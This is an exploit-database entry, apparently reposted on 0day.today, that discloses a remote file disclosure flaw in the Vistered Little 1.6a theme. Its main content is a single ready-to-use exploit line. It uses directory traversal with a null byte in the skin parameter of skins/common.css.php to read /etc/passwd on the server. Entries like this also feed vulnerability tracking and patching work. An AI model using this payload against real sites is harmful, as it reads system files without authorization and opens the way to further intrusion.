id: 1917
date: 05/27/2007
title: Vistered Little 1.6a (skin) Remote File Disclosure Vulnerability
author: GoLd_M
cves: 

================================================================
Vistered Little 1.6a (skin) Remote File Disclosure Vulnerability
================================================================


# Vistered Little 1.6a Remote File Disclosure Vulnerability
# Page Script : http://windyroad.org/vistered-little-1.6a.zip
# Exploit : [path]/skins/common.css.php?skin=../../../../../../etc/passwd%00



#  0day.today [2023-03-27]  #